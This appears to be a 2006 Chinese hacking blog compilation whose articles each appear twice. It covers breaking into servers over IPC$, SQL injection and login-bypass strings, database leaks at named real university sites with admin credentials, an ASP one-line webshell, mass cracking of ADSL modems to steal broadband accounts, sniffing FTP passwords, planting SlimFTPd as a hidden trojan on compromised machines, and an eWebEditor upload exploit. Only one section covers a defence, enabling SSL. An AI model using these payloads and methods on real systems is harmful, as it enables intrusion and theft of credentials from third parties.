(四)冰河8.4 操作系統:win2000 server 或者winxp系統。 「shed.exe」:其實就是用來網上查共享資源的,速度快,可以查到很多服務斷的共項文件,不過在這裡面有些ip在瀏覽器中無法訪問,這是因為其中也包含了個人上網的ip.呵呵!一些作網站,網吧的服務器一些目錄都是共享的,有些是可以訪問,但是不能刪除,因為你所訪問的都是以匿名訪問的,所以權限不夠!有些需要密碼。遇到密碼怎辦?用流光! 「流光」雖說對202作了限制,但是對小日本的ip可是沒有限制的,呵呵!所以說使用流光的ipc探測,建立一個空對話,查到用戶列表,然後先簡單探測,此時有些網管懶惰,把administrator設置的過於簡單,呵呵,你就可以抓到了。
下一步如何做呢?也許在你查對方的端口時發現對方開的端口很少,比如ftp沒開,怎辦呢?冰河! 「冰河」,想必許多朋友都玩過,使用冰河控制一台服務器速度很快,(因為服務器那邊帶寬很大)幾分鐘就可以查到對方主機的主頁所在位置。但是如何上傳並且控制他呢? 「cmd.exe」 是2000下的dos了,執行cmd.exe 使用net命令,
具體操作如下:
第一步:net use \\ip\ipc$ 「password」 /user:」user」 說明:以一個超級用戶名與你想黑的網站建立聯接,當然超級用戶必須是該網站admin裡的。這裡的」ip」就是主機了,「password」就是超級用戶的密碼,「user」就是超級用戶。比如:net use \\210.248.250.2\ipc$ 「maozhiie」 /user:maozhijie
- Nov 26 Sun 2006 13:38
<Hackbase>漏洞入侵:上傳漏洞
找漏洞入侵1.上傳漏洞[不多講]
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現「請登陸後使用」,80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞[不多講]
pS:對MD5密碼.有時我們不是哪麼容易跑出來.如果是[SQL數據庫].那麼我們可以用以下命令:
http://注入網址;update admin set password=』新MD5密碼』 where password=』舊MD5密碼』-- [admin為表名.]
3.旁注,也就是跨站.
我們入侵某站時可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務器的站點,然後在利用這個站點用提權,嗅探等方法來入侵我們 要入侵的站點。,在這裡有個難點,就是一些服務器的絕對路徑經過加密,這就看我們的本事了
4.暴庫:把二級目錄中間的/換成%5c
EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=職責範圍&BigClassType=1
如果你能看到:』E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa』不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否 連接到文件存放的服務器。
這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行.
5.』or』=』or』這是一個可以連接SQL的語名句.可以直接進入後台。我收集了一下。類似的還有:
』or』』=』 " or "a"="a 』) or (』a』=』a ") or ("a"="a or 1=1-- 』 or 』a』=』a
6.社會工程學。這個我們都知道吧。就是猜解。
EY:http://www.neu.edu.cn/waishi/admin
admin waishi
7.寫入ASP格式數據庫。就是一句話木馬[〈%execute request("value")%〉 ],常用在留言本.
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[這個就是ASP格式的數據庫],再寫入一句話木馬
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現「請登陸後使用」,80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞[不多講]
pS:對MD5密碼.有時我們不是哪麼容易跑出來.如果是[SQL數據庫].那麼我們可以用以下命令:
http://注入網址;update admin set password=』新MD5密碼』 where password=』舊MD5密碼』-- [admin為表名.]
3.旁注,也就是跨站.
我們入侵某站時可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務器的站點,然後在利用這個站點用提權,嗅探等方法來入侵我們 要入侵的站點。,在這裡有個難點,就是一些服務器的絕對路徑經過加密,這就看我們的本事了
4.暴庫:把二級目錄中間的/換成%5c
EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=職責範圍&BigClassType=1
如果你能看到:』E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa』不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否 連接到文件存放的服務器。
這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行.
5.』or』=』or』這是一個可以連接SQL的語名句.可以直接進入後台。我收集了一下。類似的還有:
』or』』=』 " or "a"="a 』) or (』a』=』a ") or ("a"="a or 1=1-- 』 or 』a』=』a
6.社會工程學。這個我們都知道吧。就是猜解。
EY:http://www.neu.edu.cn/waishi/admin
admin waishi
7.寫入ASP格式數據庫。就是一句話木馬[〈%execute request("value")%〉 ],常用在留言本.
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[這個就是ASP格式的數據庫],再寫入一句話木馬
- Nov 26 Sun 2006 13:29
<Hackbase>一分鐘攻破ADSL盜遍寬帶密碼
在16期《紅客路線》欄目的《黑軟尋寶圖》中,簡單地介紹了一款破解ADSL帳號密碼的軟件「ADSL密碼終結者2005」,很多朋友給來子寫信想知道這款軟件的具體用法,為了滿足大家的需求,來子特別安排了本文,一步一步詳細介紹「ADSL密碼終結者2005」的使用方法。
一、指定入侵IP地址
在入侵ADSL貓之前,我們首先要從指定的IP地址段中,找到使用ADSL貓自動撥號上網的寬帶用戶,這就離不開掃瞄工具了。ADSL密碼終結者2005中已經自帶了掃瞄工具,而且還提供了IP地址段查詢功能,可以方便的指定要入侵的IP地址段。
運行ADSL密碼終結者2005後,點擊「掃瞄選項」標籤,在「開始IP(S)」中填上要掃瞄的IP範圍的起始IP地址(如圖1),比如「60.220.1.1」,然後在「結束IP(E)」中填寫IP範圍的結尾IP地址,比如「60.220.254.254」,下面狀態欄會出現此IP範圍內總的IP數目。最後點擊「加入列表(A)」將此IP段加入到IP列表。「備註」可以不用填,程序會自動加上。
如果不知道自己所在地區的IP地址段,或者想入侵某個指定地區的ADSL貓,可以使用軟件的IP地址查詢功能。以筆者為例,所在地為貴州安順,想要破解入侵當地的ADSL上網帳號,點擊界面中的「工具」選項卡,在這裡有一個IP數據庫查詢功能。首先選擇查詢類型為「地址→IP」,然後在查詢字段中輸入要查詢的地區名稱「安順」。然後點擊「查詢」按鈕,很快就會在下方的列表中顯示所在地的IP地址段了(如圖2)。
使用IP地址查詢功能,也可以方便地查詢出某個IP地址段所對應的物理位置。只需要選擇查詢類型為「IP→地址」,輸入要查詢的IP地址點擊查詢按鈕即可。
使用Shift鍵選擇列表中的所有IP地址段,然後點擊右鍵,在彈出菜單中選擇「添加到IP範圍列表」命令,可將所有IP地址自動添加到掃瞄選項頁面列表中。
二、設置掃瞄選項
許多ADSL貓的默認設置頁面都是通過80端口進行訪問的,但是有的用戶可能會更改此端口,一些特殊類型的ADSL貓,可能也需要指定某個特定的端口。在「掃瞄選項」頁面中的「端口」處,可以設置此端口(如圖3)。
另外可以指定掃瞄的線程數,採用多線程進行掃瞄。不過要注意的是,線程數越大,掃瞄速度越快,但是可能會佔用大量系統資源,如果機器性能不高或者網絡帶寬不夠,不要用太大的線程數,一般使用400線程即可。
在「超時」項中可以設置指定超時值,超時值越大,掃瞄速度會慢,在網絡質量不太好的情況下,可以將該值設置較大些。
ADSL密碼終結者2005是通過密碼字典破解掃瞄到的ADSL貓登錄密碼的,程序已經自帶了目前鐵通和電信部門常用的ADSL貓默認用戶名和密碼。也可以在掃瞄選項中的「ADSL密碼字典」處,指定密碼字典文件的路徑,或直接在下方的列表窗口中添加某個類型ADSL貓的默認用戶名和密碼。
自己製作密碼字典時,需要將用戶名和密碼按「用戶名=密碼」的格式添加到字典中,一行一個信息。
三、掃瞄破解一步完成
設置完掃瞄破解選項後,就可以開始對指定IP段的ADSL貓進行入侵了。點擊界面中的「掃瞄」標籤,然後點擊中間的「開始」按鈕,程序就開始自動掃瞄指定IP範圍內的每一台主機(如圖4)。如果該IP使用的是ADSL貓自動撥號上網,程序就會使用密碼字典自動破解此貓的登錄密碼,不用再像以前一樣一個個地手工登錄測試了。如果成功登錄到ADSL貓的管理頁面,程序還會自動搜索保存在網頁中的寬帶撥號上網的帳號和密碼,並將其顯示在列表中!
顯示在列表中的IP地址,表示該IP地址對應的ADSL貓使用了自動撥號上網方式(如圖5)。並且在列表還會顯示該IP地址對應的ADSL貓登錄用戶名和密碼,及該ADSL貓的類型品牌信息,同時還會顯示該IP對應的地理位置。從圖中可以看到已經破解出了一個ADSL貓的登錄用戶名密碼,該ADSL貓對應的IP地址為「220.172.127.55」,並且得到了該ADSL貓主人的寬帶上網帳號和密碼!——怎麼樣,夠簡單吧!!
一、指定入侵IP地址
在入侵ADSL貓之前,我們首先要從指定的IP地址段中,找到使用ADSL貓自動撥號上網的寬帶用戶,這就離不開掃瞄工具了。ADSL密碼終結者2005中已經自帶了掃瞄工具,而且還提供了IP地址段查詢功能,可以方便的指定要入侵的IP地址段。
運行ADSL密碼終結者2005後,點擊「掃瞄選項」標籤,在「開始IP(S)」中填上要掃瞄的IP範圍的起始IP地址(如圖1),比如「60.220.1.1」,然後在「結束IP(E)」中填寫IP範圍的結尾IP地址,比如「60.220.254.254」,下面狀態欄會出現此IP範圍內總的IP數目。最後點擊「加入列表(A)」將此IP段加入到IP列表。「備註」可以不用填,程序會自動加上。
如果不知道自己所在地區的IP地址段,或者想入侵某個指定地區的ADSL貓,可以使用軟件的IP地址查詢功能。以筆者為例,所在地為貴州安順,想要破解入侵當地的ADSL上網帳號,點擊界面中的「工具」選項卡,在這裡有一個IP數據庫查詢功能。首先選擇查詢類型為「地址→IP」,然後在查詢字段中輸入要查詢的地區名稱「安順」。然後點擊「查詢」按鈕,很快就會在下方的列表中顯示所在地的IP地址段了(如圖2)。
使用IP地址查詢功能,也可以方便地查詢出某個IP地址段所對應的物理位置。只需要選擇查詢類型為「IP→地址」,輸入要查詢的IP地址點擊查詢按鈕即可。
使用Shift鍵選擇列表中的所有IP地址段,然後點擊右鍵,在彈出菜單中選擇「添加到IP範圍列表」命令,可將所有IP地址自動添加到掃瞄選項頁面列表中。
二、設置掃瞄選項
許多ADSL貓的默認設置頁面都是通過80端口進行訪問的,但是有的用戶可能會更改此端口,一些特殊類型的ADSL貓,可能也需要指定某個特定的端口。在「掃瞄選項」頁面中的「端口」處,可以設置此端口(如圖3)。
另外可以指定掃瞄的線程數,採用多線程進行掃瞄。不過要注意的是,線程數越大,掃瞄速度越快,但是可能會佔用大量系統資源,如果機器性能不高或者網絡帶寬不夠,不要用太大的線程數,一般使用400線程即可。
在「超時」項中可以設置指定超時值,超時值越大,掃瞄速度會慢,在網絡質量不太好的情況下,可以將該值設置較大些。
ADSL密碼終結者2005是通過密碼字典破解掃瞄到的ADSL貓登錄密碼的,程序已經自帶了目前鐵通和電信部門常用的ADSL貓默認用戶名和密碼。也可以在掃瞄選項中的「ADSL密碼字典」處,指定密碼字典文件的路徑,或直接在下方的列表窗口中添加某個類型ADSL貓的默認用戶名和密碼。
自己製作密碼字典時,需要將用戶名和密碼按「用戶名=密碼」的格式添加到字典中,一行一個信息。
三、掃瞄破解一步完成
設置完掃瞄破解選項後,就可以開始對指定IP段的ADSL貓進行入侵了。點擊界面中的「掃瞄」標籤,然後點擊中間的「開始」按鈕,程序就開始自動掃瞄指定IP範圍內的每一台主機(如圖4)。如果該IP使用的是ADSL貓自動撥號上網,程序就會使用密碼字典自動破解此貓的登錄密碼,不用再像以前一樣一個個地手工登錄測試了。如果成功登錄到ADSL貓的管理頁面,程序還會自動搜索保存在網頁中的寬帶撥號上網的帳號和密碼,並將其顯示在列表中!
顯示在列表中的IP地址,表示該IP地址對應的ADSL貓使用了自動撥號上網方式(如圖5)。並且在列表還會顯示該IP地址對應的ADSL貓登錄用戶名和密碼,及該ADSL貓的類型品牌信息,同時還會顯示該IP對應的地理位置。從圖中可以看到已經破解出了一個ADSL貓的登錄用戶名密碼,該ADSL貓對應的IP地址為「220.172.127.55」,並且得到了該ADSL貓主人的寬帶上網帳號和密碼!——怎麼樣,夠簡單吧!!
- Nov 26 Sun 2006 13:25
<Hackbase>網站安全:FTP服務器的攻防實戰
通過FTP站點下載文件是目前最常用的傳輸文件方法之一,特別是對於企業用戶來說,公司建立一個專門的FTP服務器提供給員工,讓他們通過這個服務器共享資源是最便利的辦法。不過作為網絡管理員的你是否真正瞭解FTP的安全呢?不要以為設置個複雜的管理員帳戶密碼就可以萬事無憂了,也不要以為將系統安裝上最新的補丁或者選擇最新版SERV-U等FTP搭建工具就可以萬無一失了。今天就由筆者帶領為大家介紹在默認情況下FTP站點傳輸數據方面的漏洞,當然在文中還會為讀者介紹如何彌補這些漏洞。
一、破解FTP用戶名和密碼
首先我們要知道默認情況下FTP站點信息是用明文進行傳輸的,沒有進行任何的加密。也就是說當用戶登錄FTP站點輸入用戶名和密碼時,這些信息是沒有加密的。非法用戶可以通過sniffer等工具將這些信息還原成本來面目。
實戰:通過sniffer將FTP站點的用戶名和密碼還原成明文
環境描述:
公司網絡中AB兩台計算機通過交換機相互連接到同一個子網,B是員工計算機,一名員工通過他訪問公司的FTP服務器,登錄FTP時使用自己的用戶名和密碼。A是我們安裝了sniffer的計算機,通過sniffer我們可以監測出使用B計算機的員工訪問FTP服務器的用戶名和密碼。
實現方法:
第一步:首先在A計算機上安裝強大的sniffer工具,並啟動該程序。
第二步:在sniffer軟件中通過上方的「matrix」按鈕啟動監測界面。
第三步:打開監測界面後我們就可以開始監測網絡中的數據包了,通過菜單欄的「capture->start」啟動。
第四步:在檢測數據包窗口中我們點左下角的objects標籤,然後選擇station,這樣將把當前網絡中所有通信都顯示在窗口中。
第五步:這時候如果B計算機的員工使用電腦登錄了FTP服務器,那麼我們在sniffer中點菜單的「capture->stop and display」。
第六步:這裡假設我們FTP服務器的IP地址為211.154.80.30,那麼我們從顯示的地址列表中找到關於211.154.80.30這個IP的數據包,然後點下方的「DECODE」按鈕進行數據包再分析。
第七步:在「DECODE」(反編碼)界面中我們就可以對關於211.154.80.30的所有數據包進行分析了。我們一個一個的分析數據包,分析到大概第十二個數據包時出現用戶名信息,我們可以從界面中看到用戶名為softer。
第八步:繼續往下看,到了第十四個數據包的時候就可以看到密碼了,密碼以明文的形式顯示在sniffer中,密碼為pacino。
至此我們就通過sniffer工具將員工在FTP服務器上的用戶名和密碼破解出來,該方法在員工和安裝了sniffer的計算機處在同一個子網的情況下有效。
二、加密FTP站點信息的傳輸
既然知道了FTP服務器是以明文方式傳輸數據的,特別是用戶名和密碼傳輸的安全性極差,信息很容易被盜,雖然FTP提供了SSL加密的功能,不過默認情況下是沒有啟用的,如大家常用的Serv-U FTP服務器(簡稱Serv-U)。所以說為了保證傳輸的數據信息不被隨意竊取,有必要啟用SSL功能,提高服務器數據傳輸的安全性。我們以Serv-u為例進行介紹來彌補這個安全缺陷。
小提示:什麼是SSL加密協議?SSL協議(Secure Socket Layer,安全套接層)是由網景(Netscape)公司推出的一種安全通信協議,它能夠對信用卡和個人信息提供較強的保護。SSL是對計算機之間整個會話進行加密的協議。在SSL中,採用了公開密鑰和私有密鑰兩種加密方法。所以使用SSL協議後我們就可以保證網絡中傳輸的數據不被非法用戶竊取到了。
(1)安裝Serv-U服務器
由於安裝Serv-U的文章比較多,所以本文就不詳細介紹了。(如圖6)安裝完畢後我們要建立一個FTP服務器的域並設置相應的用戶名和密碼。
(2)創建SSL證書
要想使用Serv-U的SSL功能,需要SSL證書的支持才行。雖然Serv-U在安裝之時就已經自動生成了一個SSL證書,但這個默認生成的SSL證書在所有的Serv-U服務器中都是一樣的,非常不安全,所以我 們需要手工創建一個自己獨特的SSL證書。
第一步:在「Serv-U管理員」窗口中,展開「本地服務器->設置」選項,然後切換到「SSL證書」標籤頁。
第二步:創建一個新的SSL證書。首先在「普通名稱」欄中輸入FTP服務器的IP地址,接著其它欄目的內容,如電子郵件、組織和單位等,根據用戶的情況進行填寫。
第三步:完成SSL證書標籤頁中所有內容的填寫後,點擊下方的「應用」按鈕即可,這時Serv-U就會生成一個新的SSL證書。
一、破解FTP用戶名和密碼
首先我們要知道默認情況下FTP站點信息是用明文進行傳輸的,沒有進行任何的加密。也就是說當用戶登錄FTP站點輸入用戶名和密碼時,這些信息是沒有加密的。非法用戶可以通過sniffer等工具將這些信息還原成本來面目。
實戰:通過sniffer將FTP站點的用戶名和密碼還原成明文
環境描述:
公司網絡中AB兩台計算機通過交換機相互連接到同一個子網,B是員工計算機,一名員工通過他訪問公司的FTP服務器,登錄FTP時使用自己的用戶名和密碼。A是我們安裝了sniffer的計算機,通過sniffer我們可以監測出使用B計算機的員工訪問FTP服務器的用戶名和密碼。
實現方法:
第一步:首先在A計算機上安裝強大的sniffer工具,並啟動該程序。
第二步:在sniffer軟件中通過上方的「matrix」按鈕啟動監測界面。
第三步:打開監測界面後我們就可以開始監測網絡中的數據包了,通過菜單欄的「capture->start」啟動。
第四步:在檢測數據包窗口中我們點左下角的objects標籤,然後選擇station,這樣將把當前網絡中所有通信都顯示在窗口中。
第五步:這時候如果B計算機的員工使用電腦登錄了FTP服務器,那麼我們在sniffer中點菜單的「capture->stop and display」。
第六步:這裡假設我們FTP服務器的IP地址為211.154.80.30,那麼我們從顯示的地址列表中找到關於211.154.80.30這個IP的數據包,然後點下方的「DECODE」按鈕進行數據包再分析。
第七步:在「DECODE」(反編碼)界面中我們就可以對關於211.154.80.30的所有數據包進行分析了。我們一個一個的分析數據包,分析到大概第十二個數據包時出現用戶名信息,我們可以從界面中看到用戶名為softer。
第八步:繼續往下看,到了第十四個數據包的時候就可以看到密碼了,密碼以明文的形式顯示在sniffer中,密碼為pacino。
至此我們就通過sniffer工具將員工在FTP服務器上的用戶名和密碼破解出來,該方法在員工和安裝了sniffer的計算機處在同一個子網的情況下有效。
二、加密FTP站點信息的傳輸
既然知道了FTP服務器是以明文方式傳輸數據的,特別是用戶名和密碼傳輸的安全性極差,信息很容易被盜,雖然FTP提供了SSL加密的功能,不過默認情況下是沒有啟用的,如大家常用的Serv-U FTP服務器(簡稱Serv-U)。所以說為了保證傳輸的數據信息不被隨意竊取,有必要啟用SSL功能,提高服務器數據傳輸的安全性。我們以Serv-u為例進行介紹來彌補這個安全缺陷。
小提示:什麼是SSL加密協議?SSL協議(Secure Socket Layer,安全套接層)是由網景(Netscape)公司推出的一種安全通信協議,它能夠對信用卡和個人信息提供較強的保護。SSL是對計算機之間整個會話進行加密的協議。在SSL中,採用了公開密鑰和私有密鑰兩種加密方法。所以使用SSL協議後我們就可以保證網絡中傳輸的數據不被非法用戶竊取到了。
(1)安裝Serv-U服務器
由於安裝Serv-U的文章比較多,所以本文就不詳細介紹了。(如圖6)安裝完畢後我們要建立一個FTP服務器的域並設置相應的用戶名和密碼。
(2)創建SSL證書
要想使用Serv-U的SSL功能,需要SSL證書的支持才行。雖然Serv-U在安裝之時就已經自動生成了一個SSL證書,但這個默認生成的SSL證書在所有的Serv-U服務器中都是一樣的,非常不安全,所以我 們需要手工創建一個自己獨特的SSL證書。
第一步:在「Serv-U管理員」窗口中,展開「本地服務器->設置」選項,然後切換到「SSL證書」標籤頁。
第二步:創建一個新的SSL證書。首先在「普通名稱」欄中輸入FTP服務器的IP地址,接著其它欄目的內容,如電子郵件、組織和單位等,根據用戶的情況進行填寫。
第三步:完成SSL證書標籤頁中所有內容的填寫後,點擊下方的「應用」按鈕即可,這時Serv-U就會生成一個新的SSL證書。
- Nov 26 Sun 2006 13:17
<Hackbase>超級小的FTP木馬——SlimFTPd的配置
來個腦筋急轉彎緩解一下緊張的氣氛先:如果你用《黑防》的知識一不小心得到一台肉雞,裡面又有許多你想要的東西,你會怎麼辦呢?怎麼樣沒有人知道吧,呵呵,當然是把他們拷回來了!
好了只是輕鬆一下,現在我們進入主題,正如我的腦筋急轉彎說的,大家的答案也應該是拷回來吧!,但是關鍵是怎麼拷呢?用Serv—U,把肉雞建成為一個ftp服務器,然後狂拷東西!好,如果你不怕管理員發現你的Serv—U,或者其他的大個頭的ftp軟件,那麼你可以看下一篇文章了。什麼?怕呀!對,這就對了,凡事小心為妙,那麼就用激烈的掌聲有請這款小巧玲瓏綠色環保功能強大配置簡單開機自啟動老少咸宜居家旅行必備的ftp木馬——SlimFTPd。唉,不要亂扔西紅柿呀,吃西紅柿可以用來減肥的………
我們到國外的網站http://www.whitsoftdev.com/slimftpd/可以下載到最新版本,我這裡用的3.17版本是7月11號發行的,壓縮包只有40多k,解壓出來也不到90k,他的官方網站上對他的功能有介紹,可惜我的英語學的不怎麼樣(書到用時方恨少,下一句是什麼來著?到完稿還不知道,有知道的告訴一聲,謝了!),所以就不冒充翻譯行家了,只是鄭重的告訴你,你想要的功能它都有!好不好用試一下就知道了(反正俺們這裡人用過的都說好)。本文主要講如何配置這款小木馬。
解壓出來有4個文件:slimftpd.conf、slimftpd.xml、SlimFTPd.exe、ServiceTool.exe。
下面我們來配置ftp小木馬:用記事本打開slimftpd.conf,恐怖全部都是英語!
害怕的可以看下一篇文章了,剩下的留下看怎麼配置。其實沒有什麼,這些英文主要是在介紹怎麼配置。是我配置的賬號。
大體的意思是建立一個用戶名為www.hacker.com.cn,密碼是3.1415926的賬號,這個賬號的用的目錄是C:\mine,賬號的權限是可讀、可瀏覽、可寫。
好了就這麼簡單,沒有什麼可怕的。注意,建立賬號的時候一定要按照下面的格式寫:
Password "password"
Mount / 目錄
Allow / Read
Allow / List
Allow / Write
空格等符號不能漏掉,而且要寫在記事本的最後面一行!即
#
#
的下面,否則程序不能運行!
要是想建立更多的賬號,只要在上一個賬號的下面空開一行,繼續按照上面的格式寫就可以了。
還有一項是我們要設置的,那就是我們要設置連接的端口,默認是21,為了避免衝突,最好不用默認的端口,用大於1024的端口,例如我們設置為2005,那就把這個conf文件中BindPort後面的數字改為你想要的端口2005。
其餘的幾項例如連接超時、最大連接數量等保存為默認就可以了。到這裡基本上就設置好了,把這個conf文件保存,連同其他幾個文件一起拷到肉雞的某一個目錄裡面。
雙擊運行SlimFTPd.exe,它會在同一個目錄下面生成一個名為slimftpd.log的文檔,我們看一下它的內容。
如果你在slimftpd.log看到上面的內容,恭喜,你的木馬運行了,你可以用ftp來連接你的肉雞,拷貝東西了。你的操作會在這個slimftpd.log裡留下記錄,例如我在我的ftp目錄裡建立了一個名為「新文件」 的文件夾,並且成功下載了wrar33r-chn.exe,它會在裡面留下記錄。
但是注意,現在我們的ftp木馬是不會隨機器啟動的,我們必須運行一下ServiceTool.exe,把SlimFTPd.exe註冊為系統服務:雙擊ServiceTool.exe出現如下對話框。
然後點擊install,出現下面的界面。
是一個出錯的窗體。不用管他,點擊確定,現在我們的木馬就註冊為系統服務了,可以隨機啟動了。這裡有一個問題,說讓你運行net start slimftpd來啟動服務,但是你這樣啟動服務的時候它卻提示服務已經啟動。
還有,有時候雖然說是服務不能啟動,但是卻可以開機自動運行了,為什麼?希望高手指教。總之現在我們的ftp服務器已經可以隨機啟動了。如果你不想讓它隨機啟動了,同樣雙擊ServiceTool.exe,出現對話框。
點擊uninstall就可以了。
好了,關於這款小馬我就介紹在這裡,小巧玲瓏綠色環保功能強大配置簡單開機自啟動老少咸宜居家旅行必備是這款小馬的主要特點(暈,怎麼西紅柿又來了……),相信你在用的過程中會有體會的。但是這個小馬也有自己的弱點:就是會在進程裡有顯示^_^。但是相信我們的高手會利用《黑防》以前講到的知識解決這個問題、打造出更加完美的SlimFTPd的,期待中……
好了只是輕鬆一下,現在我們進入主題,正如我的腦筋急轉彎說的,大家的答案也應該是拷回來吧!,但是關鍵是怎麼拷呢?用Serv—U,把肉雞建成為一個ftp服務器,然後狂拷東西!好,如果你不怕管理員發現你的Serv—U,或者其他的大個頭的ftp軟件,那麼你可以看下一篇文章了。什麼?怕呀!對,這就對了,凡事小心為妙,那麼就用激烈的掌聲有請這款小巧玲瓏綠色環保功能強大配置簡單開機自啟動老少咸宜居家旅行必備的ftp木馬——SlimFTPd。唉,不要亂扔西紅柿呀,吃西紅柿可以用來減肥的………
我們到國外的網站http://www.whitsoftdev.com/slimftpd/可以下載到最新版本,我這裡用的3.17版本是7月11號發行的,壓縮包只有40多k,解壓出來也不到90k,他的官方網站上對他的功能有介紹,可惜我的英語學的不怎麼樣(書到用時方恨少,下一句是什麼來著?到完稿還不知道,有知道的告訴一聲,謝了!),所以就不冒充翻譯行家了,只是鄭重的告訴你,你想要的功能它都有!好不好用試一下就知道了(反正俺們這裡人用過的都說好)。本文主要講如何配置這款小木馬。
解壓出來有4個文件:slimftpd.conf、slimftpd.xml、SlimFTPd.exe、ServiceTool.exe。
下面我們來配置ftp小木馬:用記事本打開slimftpd.conf,恐怖全部都是英語!
害怕的可以看下一篇文章了,剩下的留下看怎麼配置。其實沒有什麼,這些英文主要是在介紹怎麼配置。是我配置的賬號。
大體的意思是建立一個用戶名為www.hacker.com.cn,密碼是3.1415926的賬號,這個賬號的用的目錄是C:\mine,賬號的權限是可讀、可瀏覽、可寫。
好了就這麼簡單,沒有什麼可怕的。注意,建立賬號的時候一定要按照下面的格式寫:
Password "password"
Mount / 目錄
Allow / Read
Allow / List
Allow / Write
空格等符號不能漏掉,而且要寫在記事本的最後面一行!即
#
#
的下面,否則程序不能運行!
要是想建立更多的賬號,只要在上一個賬號的下面空開一行,繼續按照上面的格式寫就可以了。
還有一項是我們要設置的,那就是我們要設置連接的端口,默認是21,為了避免衝突,最好不用默認的端口,用大於1024的端口,例如我們設置為2005,那就把這個conf文件中BindPort後面的數字改為你想要的端口2005。
其餘的幾項例如連接超時、最大連接數量等保存為默認就可以了。到這裡基本上就設置好了,把這個conf文件保存,連同其他幾個文件一起拷到肉雞的某一個目錄裡面。
雙擊運行SlimFTPd.exe,它會在同一個目錄下面生成一個名為slimftpd.log的文檔,我們看一下它的內容。
如果你在slimftpd.log看到上面的內容,恭喜,你的木馬運行了,你可以用ftp來連接你的肉雞,拷貝東西了。你的操作會在這個slimftpd.log裡留下記錄,例如我在我的ftp目錄裡建立了一個名為「新文件」 的文件夾,並且成功下載了wrar33r-chn.exe,它會在裡面留下記錄。
但是注意,現在我們的ftp木馬是不會隨機器啟動的,我們必須運行一下ServiceTool.exe,把SlimFTPd.exe註冊為系統服務:雙擊ServiceTool.exe出現如下對話框。
然後點擊install,出現下面的界面。
是一個出錯的窗體。不用管他,點擊確定,現在我們的木馬就註冊為系統服務了,可以隨機啟動了。這裡有一個問題,說讓你運行net start slimftpd來啟動服務,但是你這樣啟動服務的時候它卻提示服務已經啟動。
還有,有時候雖然說是服務不能啟動,但是卻可以開機自動運行了,為什麼?希望高手指教。總之現在我們的ftp服務器已經可以隨機啟動了。如果你不想讓它隨機啟動了,同樣雙擊ServiceTool.exe,出現對話框。
點擊uninstall就可以了。
好了,關於這款小馬我就介紹在這裡,小巧玲瓏綠色環保功能強大配置簡單開機自啟動老少咸宜居家旅行必備是這款小馬的主要特點(暈,怎麼西紅柿又來了……),相信你在用的過程中會有體會的。但是這個小馬也有自己的弱點:就是會在進程裡有顯示^_^。但是相信我們的高手會利用《黑防》以前講到的知識解決這個問題、打造出更加完美的SlimFTPd的,期待中……
- Nov 26 Sun 2006 13:12
<Hackbase>eWebEditor:網站中的隱形炸彈
站長在使用eWebEditor的時候是否發現,eWebEditor配置不當會使其成為網站中的隱形炸彈呢?第一次發現這漏洞源於去年的一次入侵,在山窮水盡的時候發現了eWebEditor,於是很簡單就獲得了WebShell。後來又有好幾次利用eWebEditor進行入侵的成功經歷,這才想起應該寫一篇文章和大家共享一下,同時也請廣大已經使用了eWebEditor的站長趕緊檢查一下自己的站點。要不然,下一個被黑的就是你哦!
漏洞利用
利用eWebEditor獲得WebShell的步驟大致如下:
1.確定網站使用了eWebEditor。一般來說,我們只要注意發表帖子(文章)的頁面是否有類似做了記號的圖標,就可以大致做出判斷了。
2.查看源代碼,找到eWebEditor的路徑。點擊「查看源代碼」,看看源碼中是否存在類似「」的語句。其實只有發現了存在這樣的語句了,才可以真正確定這個網站使用了eWebEditor。然後記下src=』***』中的「***」,這就是eWebEditor路徑。
3.訪問eWebEditor的管理登錄頁面。eWebEditor的默認管理頁面為admin_login.asp,和ewebeditor.asp在同一目錄下。以上面的路徑為例,我們訪問的地址為:http://www.***.net/edit/admin_login.asp,看看是否出現了登錄頁面。
如果沒有看到這樣的頁面,說明管理員已經刪除了管理登錄頁面,呵呵,還等什麼,走人啊,換個地方試試。不過一般來說,我很少看到有哪個管理員刪了這個頁面,試試默認的用戶名:admin,密碼:admin888。怎麼樣?成功了吧(不是默認賬戶請看後文)!
4.增加上傳文件類型。點擊「樣式管理」,隨便選擇列表中底下的某一個樣式的「設置,為什麼要選擇列表中底下的樣式?因為eWebEditor自帶的樣式是不允許修改的,當然你也可以拷貝一個新的樣式來設置。
然後在上傳的文件類型中增加「asa」類型。
5.上傳ASP木馬,獲得WebShell。接下來將ASP木馬的擴展名修改為asa,就可以簡單上傳你的ASP木馬了。不要問我怎麼上傳啊,看到 「預覽」 了嗎?點擊「預覽」,然後選擇「插入其它文件」的按鈕就可以了。
漏洞原理
漏洞的利用原理很簡單,請看Upload.asp文件:
任何情況下都不允許上傳asp腳本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
因為eWebEditor僅僅過濾了ASP文件。記得我第一次使用eWebEditor時就在納悶:既然作者已經知道asp文件需要過濾,為什麼不同時過濾asa、cer等文件呢?也許這就是對免費用戶不負責任的表現吧!
高級應用
eWebEditor的漏洞利用還有一些技巧:
1.使用默認用戶名和密碼無法登錄。
請試試直接下載db目錄下的ewebeditor.mdb文件,用戶名和密碼在eWebEditor_System表中,經過了md5加密,如果無法下載或者無法破解,那就當自己的運氣不好了。
2.加了asa類型後發現還是無法上傳。
應該是站長懂點代碼,自己修改了Upload.asp文件,但是沒有關係,按照常人的思維習慣,往往會直接在sAllowExt = Replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看見過一個站長是這樣修改的:
